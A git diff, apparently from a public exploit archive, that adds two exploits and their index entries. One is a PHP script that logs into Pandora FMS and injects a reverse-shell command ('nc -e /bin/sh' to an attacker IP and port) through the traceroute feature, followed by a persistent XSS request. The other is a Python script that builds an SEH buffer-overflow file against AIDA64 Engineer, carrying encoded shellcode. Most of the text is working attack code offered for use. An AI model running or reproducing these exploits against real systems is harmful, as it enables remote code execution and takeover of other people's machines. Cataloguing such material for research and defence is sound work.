diff --git a/exploits/php/webapps/48280.py b/exploits/php/webapps/48280.py
new file mode 100755
index 000000000..76eca48da
--- /dev/null
+++ b/exploits/php/webapps/48280.py
@@ -0,0 +1,92 @@
+# Exploit Title: Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution
+# Build: PC170324 - MR 0
+# Date: 2020-03-30
+# Exploit Author: Basim Alabdullah
+# Vendor homepage: http://pandorafms.org/
+# Version: 7.0
+# Software link: https://pandorafms.org/features/free-download-monitoring-software/
+# Tested on: CentOS
+#
+#                 Authenticated Remote Code Execution
+#
+#			Vulnerable file: extension/net_tools.php
+#            Vulnerable Code:
+#
+#           $traceroute = whereis_the_command ('traceroute');
+#			if (empty($traceroute)) {
+#				ui_print_error_message(__('Traceroute executable does not exist.'));
+#			}
+#			else {
+#				echo "<h3>".__("Traceroute to "). $ip. "</h3>";
+#				echo "<pre>";
+#	   ---->	echo system ("$traceroute $ip");
+#				echo "</pre>";
+#
+#                
+<?php
+
+error_reporting(0);
+$username = $argv[2];
+$password = $argv[3];
+$url = $argv[1]."/index.php?login=1";
+$postinfo = "nick=".$username."&pass=".$password."&login_button=Login";
+$attackerip = $argv[4];
+$attackerport = $argv[5];
+$payload="127.0.0.1;{nc,-e,/bin/sh,".$attackerip.",".$attackerport."}";
+
+if(!empty($argv[1]))
+{
+    $ch = curl_init();
+    curl_setopt($ch, CURLOPT_HEADER, false);
+    curl_setopt($ch, CURLOPT_NOBODY, false);
+    curl_setopt($ch, CURLOPT_URL, $url);
+    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.tmp");
+    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7");
+    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+    curl_setopt($ch, CURLOPT_REFERER, $url);
+    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
+    curl_setopt($ch, CURLOPT_POST, 1);
+    curl_setopt($ch, CURLOPT_POSTFIELDS, $postinfo);
+    curl_exec($ch);
+    curl_close($ch);
+    $ch1 = curl_init();
+    curl_setopt($ch1, CURLOPT_HEADER, false);
+    curl_setopt($ch1, CURLOPT_NOBODY, false);
+    curl_setopt($ch1, CURLOPT_URL, $argv[1]."/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/ver_agente&tab=extension&id_agente=1&id_extension=network_tools");
+    curl_setopt($ch1, CURLOPT_SSL_VERIFYHOST, 0);
+    curl_setopt($ch1, CURLOPT_COOKIEFILE, "cookie.tmp");
+    curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7");
+    curl_setopt($ch1, CURLOPT_RETURNTRANSFER, 1);
+    curl_setopt($ch1, CURLOPT_REFERER, $url);
+    curl_setopt($ch1, CURLOPT_SSL_VERIFYPEER, 0);
+    curl_setopt($ch1, CURLOPT_FOLLOWLOCATION, 1);
+    curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST");
+    curl_setopt($ch1, CURLOPT_POST, 1);
+    curl_setopt($ch1, CURLOPT_POSTFIELDS, "operation=2&select_ips=".$payload."&community=public&submit=Execute");
+    curl_exec($ch1);
+    curl_close($ch1);
+    echo $payload."\n";
+}
+else{
+    echo "\n\nphp exploit.php http://127.0.0.1/pandora_console/ username password attacker-ip attacker-port\n\n";
+}
+?>
+
+#
+# Persistent Cross-Site Scripting.
+# The value of the similar_ids request parameter is copied into the value of an HTML tag attribute which is an event handler and is encapsulated in double quotation marks. The payload 23859';document.location=1//981xgeu3m was submitted in the similar_ids parameter. This input was echoed as 23859&#039;;document.location=1//981xgeu3m in the application's response. 
+#
+# GET /pandora_console/ajax.php?page=include%2Fajax%2Fevents&get_extended_event=1&group_rep=1&event_rep=1&dialog_page=general&similar_ids=2123859'%3bdocument.location%3d1%2f%2f981xgeu3m&timestamp_first=1585865889&timestamp_last=1585865889&user_comment=&event_id=21&server_id=0&meta=0&childrens_ids=%5B0%2C12%2C8%2C4%2C9%2C2%2C10%2C13%2C11%5D&history=0 
+# HTTP/1.1
+# Host: pandorafms.host
+# User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
+# Accept: text/html, */*; q=0.01
+# Accept-Language: en-US,en;q=0.5
+# Accept-Encoding: gzip, deflate
+# Referer: http://pandorafms.host/pandora_console/index.php?sec=eventos&sec2=operation/events/events
+# X-Requested-With: XMLHttpRequest
+# Connection: close
+# Cookie: clippy_is_annoying=1; PHPSESSID=tn2pdl4p1qiq4bta26psj0mcj1
\ No newline at end of file
diff --git a/exploits/windows/local/48281.py b/exploits/windows/local/48281.py
new file mode 100755
index 000000000..231d51780
--- /dev/null
+++ b/exploits/windows/local/48281.py
@@ -0,0 +1,120 @@
+# Exploit Title: AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)
+# Date: 2020-04-02
+# Exploit Author: Hodorsec
+# Version: v6.20.5300
+# Software Link: http://download.aida64.com/aida64engineer620.exe
+# Vendor Homepage: https://www.aida64.com/products/aida64-engineer
+# Tested on: Win7 x86 SP1 - Build 7601
+
+# Description:      
+# - Exploits the "Report File" buffer when sending an e-mail report via the Report wizard. Entering an overly long string, results in a crash which overwrites SEH.
+
+# Reproduction:
+# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
+# - Run the script, a TXT file will be generated
+# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
+# - Open AIDA64 Engineer
+# - First, click on "File", "Preferences"
+# - Click menu "Report", "Report File"
+# - Enter a long string in the field "File name"
+# - Set "File extension" to automatic, as by default
+# - Click OK
+# - Second, in the main menu, click "Report" which shows the "Report Wizard"
+# - Next, "System Summary only", next, "Plain Text", Finish
+# - Click the button "Send In E-mail"
+# - Check results
+
+# WinDBG initial crash output using only A's:
+# (994.998): Access violation - code c0000005 (!!! second chance !!!)
+# eax=03ac1048 ebx=03ac100c ecx=03ac109c edx=77f070f4 esi=03ac1140 edi=00000000
+# eip=77f133a8 esp=03ac0fc8 ebp=03ac1000 iopl=0         nv up ei pl nz ac po nc
+# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
+# ntdll!RtlAcquireSRWLockShared+0x1a:
+# 77f133a8 8365f400        and     dword ptr [ebp-0Ch],0 ss:0023:03ac0ff4=????????
+
+#!/usr/bin/python
+import sys,struct
+
+filename = "aida64_engineer_poc.txt"
+
+# Maximum length
+maxlen = 5000
+
+# Shellcode, using alphanum chars due to bytes considered to be bad above \x7f
+# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b '\x00\x0a\x0d' bufferregister=eax
+# Payload size: 440 bytes
+shellcode = (
+"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
+"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
+"\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x49\x78\x6d\x52\x33\x30"
+"\x45\x50\x45\x50\x53\x50\x6b\x39\x6d\x35\x36\x51\x49\x50\x43"
+"\x54\x6e\x6b\x52\x70\x54\x70\x6c\x4b\x51\x42\x66\x6c\x4c\x4b"
+"\x62\x72\x52\x34\x6e\x6b\x54\x32\x46\x48\x54\x4f\x6d\x67\x52"
+"\x6a\x57\x56\x36\x51\x6b\x4f\x4e\x4c\x47\x4c\x31\x71\x71\x6c"
+"\x53\x32\x36\x4c\x37\x50\x5a\x61\x6a\x6f\x54\x4d\x77\x71\x5a"
+"\x67\x7a\x42\x38\x72\x70\x52\x46\x37\x4e\x6b\x53\x62\x52\x30"
+"\x6c\x4b\x52\x6a\x47\x4c\x4c\x4b\x50\x4c\x67\x61\x51\x68\x78"
+"\x63\x43\x78\x56\x61\x4a\x71\x53\x61\x6c\x4b\x33\x69\x55\x70"
+"\x37\x71\x6a\x73\x4c\x4b\x43\x79\x72\x38\x49\x73\x46\x5a\x32"
+"\x69\x4c\x4b\x44\x74\x6e\x6b\x67\x71\x58\x56\x54\x71\x6b\x4f"
+"\x6e\x4c\x49\x51\x78\x4f\x44\x4d\x63\x31\x68\x47\x30\x38\x79"
+"\x70\x30\x75\x68\x76\x43\x33\x51\x6d\x69\x68\x75\x6b\x61\x6d"
+"\x74\x64\x44\x35\x78\x64\x52\x78\x6c\x4b\x73\x68\x74\x64\x57"
+"\x71\x68\x53\x31\x76\x4c\x4b\x46\x6c\x32\x6b\x6e\x6b\x76\x38"
+"\x47\x6c\x43\x31\x6b\x63\x6c\x4b\x33\x34\x6e\x6b\x46\x61\x38"
+"\x50\x4c\x49\x77\x34\x31\x34\x61\x34\x43\x6b\x71\x4b\x53\x51"
+"\x42\x79\x33\x6a\x62\x71\x6b\x4f\x4b\x50\x53\x6f\x61\x4f\x52"
+"\x7a\x4c\x4b\x62\x32\x68\x6b\x6c\x4d\x33\x6d\x51\x7a\x37\x71"
+"\x4e\x6d\x4d\x55\x38\x32\x75\x50\x77\x70\x63\x30\x50\x50\x55"
+"\x38\x66\x51\x6e\x6b\x62\x4f\x6c\x47\x39\x6f\x59\x45\x4f\x4b"
+"\x78\x70\x58\x35\x49\x32\x52\x76\x53\x58\x4c\x66\x6c\x55\x6d"
+"\x6d\x4d\x4d\x79\x6f\x59\x45\x65\x6c\x46\x66\x51\x6c\x64\x4a"
+"\x4f\x70\x39\x6b\x59\x70\x64\x35\x47\x75\x6d\x6b\x73\x77\x66"
+"\x73\x42\x52\x42\x4f\x62\x4a\x75\x50\x31\x43\x59\x6f\x5a\x75"
+"\x51\x73\x33\x51\x62\x4c\x55\x33\x46\x4e\x70\x65\x70\x78\x53"
+"\x55\x65\x50\x41\x41"
+)
+
+# Align the registers
+# ESI = 04aaefc0, Buffer = 04abfb6c. Buffer - ESI = 0x010b8d
+align_eax = (
+                "\x56"                      # PUSH ESI
+                "\x58"                      # POP EAX
+                "\x66\x05\x3f\x10"          # ADD AX,0x103f # EAX = 0x04aaffff
+                "\x40"                      # INC EAX       # EAX = 0x04ab0000
+                "\x66\x05\x01\x7F"          # ADD AX,0x7f01 # EAX = 0x04ab7f01
+                "\x66\x05\x6b\x7c"          # ADD AX,0x7c6b # EAX = 0x04abfb6c
+                "\x50"                      # PUSH EAX
+)
+
+# Offsets
+crash_ebp = 307
+crash_esi = 1583
+crash_seh = 319
+crash_nseh = crash_seh - 4
+
+# Variables
+ascii_nop = "\x47"                                              # Doesn't do anything particular for this program
+nops = ascii_nop * 32                                           # ASCII NOP's amount
+
+# Prefix
+prefix = "A" * crash_nseh
+nseh = "\x71\x06\x70\x04"                                       # JNO SHORT # JO SHORT # Jump over NSEH/SEH
+seh = struct.pack("<L", 0x0121076e)                             # POP POP RET   # aida64.exe
+suffix = align_eax                                              # Align registers to execute shellcode
+suffix += nops                                                  # Some ASCII friendly NOP's
+suffix += shellcode                                             # Magic!
+suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Filler
+
+# Concatenate string for payload
+payload = prefix + nseh + seh + suffix                          # Put it all together
+
+try:
+    file = open(filename,"wb")
+    file.write(payload)
+    file.close()
+    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
+except:
+    print "[!] Error creating file!"
+    sys.exit(0)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index c9479c958..083c698cc 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11010,6 +11010,7 @@ id,file,description,date,author,type,platform,port
 48267,exploits/windows/local/48267.txt,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation",2020-03-30,"Daniel García Gutiérrez",local,windows,
 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows,
 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows,
+48281,exploits/windows/local/48281.py,"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)",2020-04-03,Hodorsec,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42524,3 +42525,4 @@ id,file,description,date,author,type,platform,port
 48266,exploits/cgi/webapps/48266.py,"Zen Load Balancer 3.10.1 - Remote Code Execution",2020-03-30,"Cody Sixteen",webapps,cgi,
 48270,exploits/hardware/webapps/48270.py,"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
 48271,exploits/hardware/webapps/48271.py,"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection",2020-03-31,"Jacob Baines",webapps,hardware,
+48280,exploits/php/webapps/48280.py,"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution",2020-04-03,"Basim Alabdullah",webapps,php,